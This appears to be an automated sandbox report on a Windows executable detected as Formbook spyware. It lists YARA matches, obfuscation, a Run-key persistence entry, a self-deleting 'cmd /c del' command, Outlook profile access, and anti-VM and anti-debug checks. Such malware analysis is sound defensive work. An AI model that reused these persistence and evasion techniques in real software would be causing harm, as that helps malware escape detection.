Source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/0@14/9
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0041DDA8 GetLastError,FormatMessageA, 0_2_0041DDA8
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00408606 GetDiskFreeSpaceA, 0_2_00408606
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_004137F4 FindResourceA, 0_2_004137F4
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_01
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: mp0nMsMroT.exe Virustotal: Detection: 47%
Source: mp0nMsMroT.exe ReversingLabs: Detection: 79%
Source: unknown Process created: C:\Users\user\Desktop\mp0nMsMroT.exe 'C:\Users\user\Desktop\mp0nMsMroT.exe'
Source: unknown Process created: C:\Users\user\Desktop\mp0nMsMroT.exe 'C:\Users\user\Desktop\mp0nMsMroT.exe'
Source: unknown Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\mp0nMsMroT.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Process created: C:\Users\user\Desktop\mp0nMsMroT.exe 'C:\Users\user\Desktop\mp0nMsMroT.exe' Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\mp0nMsMroT.exe' Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Binary string: wntdll.pdbUGP source: mp0nMsMroT.exe, 00000001.00000002.232510703.0000000000A90000.00000040.00000001.sdmp, NETSTAT.EXE, 00000005.00000002.451053181.00000000031DF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: mp0nMsMroT.exe, NETSTAT.EXE, 00000005.00000002.451053181.00000000031DF000.00000040.00000001.sdmp

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Unpacked PE file: 1.2.mp0nMsMroT.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_004265C8 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004265C8
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_004482AC push 00448339h; ret 0_2_00448331
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00416038 push ecx; mov dword ptr [esp], edx 0_2_0041603A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0045E088 push 0045E0B4h; ret 0_2_0045E0AC
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00448244 push 004482AAh; ret 0_2_004482A2
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00426224 push 00426250h; ret 0_2_00426248
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_004263D0 push 004263FCh; ret 0_2_004263F4
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00436418 push 00436444h; ret 0_2_0043643C
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00424540 push 0042456Ch; ret 0_2_00424564
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0042E57C push 0042E5A8h; ret 0_2_0042E5A0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0042E5CC push 0042E60Fh; ret 0_2_0042E607
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00436580 push 004365ACh; ret 0_2_004365A4
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00428608 push 00428661h; ret 0_2_00428659
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0042E634 push 0042E677h; ret 0_2_0042E66F
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_004306C8 push 0043070Ah; ret 0_2_00430702
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_004246D8 push 00424704h; ret 0_2_004246FC
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0042E6F0 push 0042E73Bh; ret 0_2_0042E733
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0042E698 push 0042E6E4h; ret 0_2_0042E6DC
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0042E748 push 0042E774h; ret 0_2_0042E76C
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00410736 push 004107AEh; ret 0_2_004107A6
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00410738 push 004107AEh; ret 0_2_004107A6
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_004107B0 push 00410858h; ret 0_2_00410850
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0041085A push 00410970h; ret 0_2_00410968
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0041A8AE push 0041A95Bh; ret 0_2_0041A953
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0041A8B0 push 0041A95Bh; ret 0_2_0041A953
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00410944 push 00410970h; ret 0_2_00410968
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0041A960 push 0041A9F0h; ret 0_2_0041A9E8
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_004069D4 push ecx; mov dword ptr [esp], eax 0_2_004069D5
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0041A9F2 push 0041AD10h; ret 0_2_0041AD08
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00462A60 push 00462A8Ch; ret 0_2_00462A84
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00460AE4 push 00460B24h; ret 0_2_00460B1C
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00412ABC push ecx; mov dword ptr [esp], edx 0_2_00412AC1

Boot Survival:

barindex
Creates an undocumented autostart registry key
Source: C:\Windows\SysWOW64\NETSTAT.EXE Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run L2KDG Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0045BB20 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 0_2_0045BB20
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0045C240 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 0_2_0045C240
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0045C2F0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 0_2_0045C2F0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_004423DC IsIconic,GetCapture, 0_2_004423DC
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00424910 IsIconic,GetWindowPlacement,GetWindowRect, 0_2_00424910
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00458B48 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 0_2_00458B48
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00442C90 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 0_2_00442C90
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_004435B4 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 0_2_004435B4
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_004265C8 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004265C8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00437104 0_2_00437104
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\mp0nMsMroT.exe RDTSC instruction interceptor: First address: 00000000004083D4 second address: 00000000004083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mp0nMsMroT.exe RDTSC instruction interceptor: First address: 000000000040876E second address: 0000000000408774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 0000000002D783D4 second address: 0000000002D783DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 0000000002D7876E second address: 0000000002D78774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_004086A0 rdtsc 1_2_004086A0
Contains functionality to detect sandboxes (mouse cursor move detection)
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject, 0_2_0045B090
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00437104 0_2_00437104
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 6556 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6184 Thread sleep time: -60000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Uses the system / local time for branch decision (may execute only at specific dates)
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00465E48 GetSystemTime followed by cmp: cmp word ptr [ebp-18h], 07dfh and CTI: jnc 00465E6Fh 0_2_00465E48
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00408454 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 0_2_00408454
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00405098 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 0_2_00405098
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D7F470 FindFirstFileW,FindNextFileW,FindClose, 5_2_02D7F470
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0041E338 GetSystemInfo, 0_2_0041E338
Source: explorer.exe, 00000002.00000000.203152657.0000000007E03000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000002.00000000.187656767.0000000000DB8000.00000004.00000020.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}=1
Source: explorer.exe, 00000002.00000000.203817798.000000000812E000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.195771567.00000000059D0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000002.00000002.460074157.000000000474A000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.203595823.0000000007FBB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000002.00000000.194401530.00000000047E8000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.196670871.0000000006912000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.203580093.0000000007FAC000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m
Source: explorer.exe, 00000002.00000000.195771567.00000000059D0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000000.195771567.00000000059D0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000002.00000000.203152657.0000000007E03000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000002.00000000.195771567.00000000059D0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Process queried: DebugFlags Jump to behavior
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_004086A0 rdtsc 1_2_004086A0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00409910 LdrLoadDll, 1_2_00409910
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00465CEC VirtualProtect ?,0000F9B9,00000104,?,00000000,0000F9B9,00003000,00000004 0_2_00465CEC
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_004265C8 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004265C8
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF90AF mov eax, dword ptr fs:[00000030h] 1_2_00AF90AF
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE20A0 mov eax, dword ptr fs:[00000030h] 1_2_00AE20A0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE20A0 mov eax, dword ptr fs:[00000030h] 1_2_00AE20A0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE20A0 mov eax, dword ptr fs:[00000030h] 1_2_00AE20A0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE20A0 mov eax, dword ptr fs:[00000030h] 1_2_00AE20A0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE20A0 mov eax, dword ptr fs:[00000030h] 1_2_00AE20A0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE20A0 mov eax, dword ptr fs:[00000030h] 1_2_00AE20A0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AEF0BF mov ecx, dword ptr fs:[00000030h] 1_2_00AEF0BF
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AEF0BF mov eax, dword ptr fs:[00000030h] 1_2_00AEF0BF
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AEF0BF mov eax, dword ptr fs:[00000030h] 1_2_00AEF0BF
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB9080 mov eax, dword ptr fs:[00000030h] 1_2_00AB9080
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B33884 mov eax, dword ptr fs:[00000030h] 1_2_00B33884
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B33884 mov eax, dword ptr fs:[00000030h] 1_2_00B33884
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB58EC mov eax, dword ptr fs:[00000030h] 1_2_00AB58EC
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB40E1 mov eax, dword ptr fs:[00000030h] 1_2_00AB40E1
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB40E1 mov eax, dword ptr fs:[00000030h] 1_2_00AB40E1
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB40E1 mov eax, dword ptr fs:[00000030h] 1_2_00AB40E1
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B4B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00B4B8D0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B4B8D0 mov ecx, dword ptr fs:[00000030h] 1_2_00B4B8D0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B4B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00B4B8D0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B4B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00B4B8D0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B4B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00B4B8D0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B4B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00B4B8D0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE002D mov eax, dword ptr fs:[00000030h] 1_2_00AE002D
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE002D mov eax, dword ptr fs:[00000030h] 1_2_00AE002D
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE002D mov eax, dword ptr fs:[00000030h] 1_2_00AE002D
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE002D mov eax, dword ptr fs:[00000030h] 1_2_00AE002D
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE002D mov eax, dword ptr fs:[00000030h] 1_2_00AE002D
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ACB02A mov eax, dword ptr fs:[00000030h] 1_2_00ACB02A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ACB02A mov eax, dword ptr fs:[00000030h] 1_2_00ACB02A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ACB02A mov eax, dword ptr fs:[00000030h] 1_2_00ACB02A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ACB02A mov eax, dword ptr fs:[00000030h] 1_2_00ACB02A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B37016 mov eax, dword ptr fs:[00000030h] 1_2_00B37016
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B37016 mov eax, dword ptr fs:[00000030h] 1_2_00B37016
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B37016 mov eax, dword ptr fs:[00000030h] 1_2_00B37016
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B84015 mov eax, dword ptr fs:[00000030h] 1_2_00B84015
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B84015 mov eax, dword ptr fs:[00000030h] 1_2_00B84015
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B72073 mov eax, dword ptr fs:[00000030h] 1_2_00B72073
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B81074 mov eax, dword ptr fs:[00000030h] 1_2_00B81074
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AD0050 mov eax, dword ptr fs:[00000030h] 1_2_00AD0050
